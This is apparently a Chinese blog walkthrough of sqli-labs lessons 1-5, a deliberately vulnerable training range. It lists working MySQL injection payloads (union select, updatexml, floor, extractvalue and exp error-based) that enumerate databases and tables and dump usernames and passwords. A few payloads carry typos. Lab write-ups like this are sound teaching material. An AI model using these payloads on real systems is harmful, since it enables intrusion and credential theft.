sql-liabs通关1-5

已于 2023-03-25 14:40:52 修改
阅读量243 收藏 1
点赞数 1
分类专栏: 靶机及靶场通关 文章标签: 数据库 sql mysql
于 2023-01-14 18:08:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/128675073
版权

目录 lesson1-5

1.lesson-1 采用联合查询union select

2.lesson-2 updatexml报错注入

3.lesson-3 floor报错注入

4.lesson-4 extractvalue报错注入

5.lesson-5 exp报错注入

1.lesson-1 采用联合查询union select

sql流程:

找注入点

判断注入类型

查询字段数

寻找回显点

查询数据库名,查版本,查用户

查询数据表名

找比较特殊的表进行查里面的列名

从表中查数据

查询方式: and 1=1, and 1=2 ,‘, “ ,),?id=1+1等

mysql注释符号:%23(#),-- +,/**/

 判断注入类型:

?id=1'

通过报错信息可以得知时单引号类型的注入,成双成对出现,多出的符号可能要闭合的符号

查询字段数

采用二分法,查询字段数,所谓二分法就是从大的开始试用,在试用一半,然后在用一半,直到成功为止。

共有三个字段

?id=1' order by 3%23  

寻找回显点:

?id=-1'union select 1,2,3%23

2和3是回显列 ,回显就是查出的数据回显在这个位置

查询数据库名,查版本,查用户:

?id=-1'union select 1,database(),3%23
?id=-1'union select 1,user(),version()%23

查版本主要是为了看mysql是否是大于5.0的版本,5.0版本以下的是需要爆破的,5.0以上版本有information_schema,里面有所有的表名,库名,字段名,数据

information_schema 字段及含义:

schema_name,table_schema  数据库名

table_name   数据表名

column_name 字段名

查用户是为了以后写shell等进行操作的

数据库名为security,查版本5.5.53,查用户root

查询数据表名:

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23

Id为-1 是为了显示后面的数据,因为只能显示一列(limit 0,1)

表名有emails,referers,uagents,users

找比较特殊的表进行查里面的列名

users 比较特殊

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' %23

字段有id,usernam,password

字段有id,usernam,password

从表中查数据:

查询第一条数据

?id=-1' union select 1,concat(id,'~',username,'~',password),3 from security.users limit 0,1%23

查询第二条数据:

?id=-1' union select 1,concat(id,'~',username,'~',password),3 from security.users limit 1,1%23

2.lesson-2 updatexml报错注入

updatexml有长度限制为32

判断注入类型:

为整型注入

?id=1'

?id=1 and 1=1

?id=1 and 1=2

查询数据库名,查版本,查用户

?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

?id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1)

?id=1 and updatexml(1,concat(0x7e,(select version()),0x7e),1)

查询数据表名:

?id=1 and updatexml(1,concat(0x7e,(select group_cocnat(table_name) from information_schema where table_schema='security'),0x7e),1)

找比较特殊的表进行查里面的列名:

?id=1 updatexml(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

从表中查数据:

查询第一条数据:

id=1 and updatexml(1,concat(0x7e,(select concat_ws(0x7e,id,username,password) from security.users limit 0,1),0x7e),1)

查询第二条数据:

?id=1 and updatexml(1,concat(0x7e,(select concat_ws(0x7e,id,username,password) from security.users limit 1,1),0x7e),1)

3.lesson-3 floor报错注入

判断注入类型:

为单引号和括号的字符型注入

查询数据库名,查版本,查用户:

?id=1') and (select 1 from(select count(*), concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

?id=1') and (select 1 from(select count(*), concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

?id=1') and (select 1 from(select count(*), concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

查询数据表名:

第一张表

?id=1') and (select 1 from(select count(*), concat((select table_name from information_schema.tables where table_schema='security' limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

第二张……

 最后一张

?id=1') and (select 1 from(select count(*), concat((select table_name from information_schema.tables where table_schema='security' limit 3,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

找比较特殊的表进行查里面的列名

第一个

?id=1') and (select 1 from(select count(*), concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

第二个……

从表中查数据

第一条

?id=1') and (select 1 from(select count(*), concat((select concat_ws(0x7e,id,username,password)from security.users limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

第二条……

4.lesson-4 extractvalue报错注入

extractvalue和updatexml使用类似

判断注入类型:

为双引号括号的字符型注入

?id=1"

查询数据库名,查版本,查用户:

?id=1") and extractvalue(1,concat(0x7e,(select database())))%23

?id=1") and extractvalue(1,concat(0x7e,(select version())))%23
?id=1") and extractvalue(1,concat(0x7e,(select user())))%23

其他操作看lesson2

5.lesson-5 exp报错注入

判断注入类型:

为单引号字符型注入

?id=1'

查询数据库名,查版本,查用户:

exp使用mysql 5.5.29正常,5.5.53查不出来

?id=1' and exp(~(select * from(select user())x))%23

 查表名:

?id=1' and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')x))%23

mushangqiujin
关注
专栏目录
SQL-Challenge通关教程
玄道的网安博客
05-09 676
首先是安装,修改配置文件,创建challenge数据库,打开http://www.test.com/setup-db.php即可安装 直接开始吧 SQL-1 传进id=1可以看到执行了sql语句,我们看看源码 源码中屏蔽了错误,所有这是盲注了 可以看到执行了AND SLEEP(5)语句就会发现沉睡了 SQL-2 这次和上一关差不多的,就是用单引号包裹住了id 我们用加多几个单引号即可 SQL-3 这次换了括号,相对应加上即可 SQL-4 这题既然开
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQL过关
weixin_34174132的博客
07-25 160
引言 做为一个web开发者,不与数据库打交道几乎是不可能的!由此可见,掌握SQL语句对于一个web开发人员来说是多么的重要。下面是我在整理电脑时,找到的资料,觉得还不错就拿出来与大家分享。不废话了,好不好你看了就知道。进入主题,本文的主要内容如下: 问题背景 SQL查询54问? 1、问题背景 本文中的SQL语句都是基于下面几张表的,这也是比较经典的用于数据库教学的数据库例子。 (1)/*员工人...
sql-libs通关详解
最新发布
hanjinming110的博客
07-24 1605
sql-libs靶场的打靶过程
SQLi-LABS Basic Challenges通关记录
qq_40481505的博客
10-14 336
Less-1 Error Based String Method 1:union注入 ?id= 1' --+ ?id=1' and 1=2 union select 1,2,3 --+ ?id=1' and 1=2 union select 1,2,database() --+ ?id=1' and 1=2 union select 1,2,group_concat(table_name) ...
sql-labs通关讲解
qq_70836100的博客
07-22 1086
目录。
sql-map-2.dtd和sql-map-config-2.dtd
06-10
本文将深入探讨与“sql-map-2.dtd”和“sql-map-config-2.dtd”相关的知识点,以及它们在Ibatis中的作用。 Ibatis是一个轻量级的ORM(对象关系映射)框架,它允许开发者将SQL语句直接写在配置文件中,通过XML映射...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
 (1)version():查看数据库版本  (2)user():查看当前用户  (3)database():查看使用的数据库  (4) limit :limit子句来分批获取所有数据  (5)group_concat():一次性获取数据库信息。
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6132
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
精通SQL--结构化查询语言详解
12-11
第1章 数据库sql基础 1 1.1 数据库的基本概念 1 1.1.1 数据库的由来 1 1.1.2 数据库系统的概念 3 1.2 数据库系统的结构、组成及工作流程 3 1.2.1 数据库的体系结构 3 1.2.2 数据库系统的组成 4 1.2.3 ...
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
SQL注入分级通关(sqli-labs)
魔仙棒棒之主的博客
05-16 1937
SQL注入分级通关
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 785
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
数据库——牛客题霸SQL篇之通关秘籍1-36
qq_43722914的博客
04-19 225
目录1. 查找最晚入职员工的所有信息2. 查找入职员工时间排名倒数第三的员工所有信息3. 查找各个部门当前领导当前薪水详情以及其对应部门编号dept_no4. 查找所有已经分配部门的员工的last_name和first_name5. 查找所有员工的last_name和first_name以及对应部门编号dept_no7. 查找薪水涨幅超过15次的员工号emp_no以及其对应的涨幅次数t8. 找出所有员工当前具体的薪水salary情况10. 获取所有非manager的员工emp_no 1. 查找最晚
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sql-labs通关详解(1-10)
guowu666的博客
05-02 765
sqli-labs 1-10通关详解。
sqli练习1-5关(超详细)
橙子鱼的博客
02-14 410
sqli练习1-5关(超详细)
sqli-liabs学习SQL注入之旅(第二十一关~第三十关)
guanjian_ci的博客
04-23 3098
二十一关 打开这一关,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十关,属于cookie注入!唯一不同的是这一关考察了一个加解密运用,cook.
JAVA与SQL-Server图书管理系统设计与开发报告
本篇文档是关于《数据库原理与应用》课程设计的报告,主题是基于Java和SQL Server的图书管理系统设计与开发。这份报告由一名学生在20XX年11月30日至12月18日期间完成,针对的是计算机科学与工程专业的学生。设计任务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值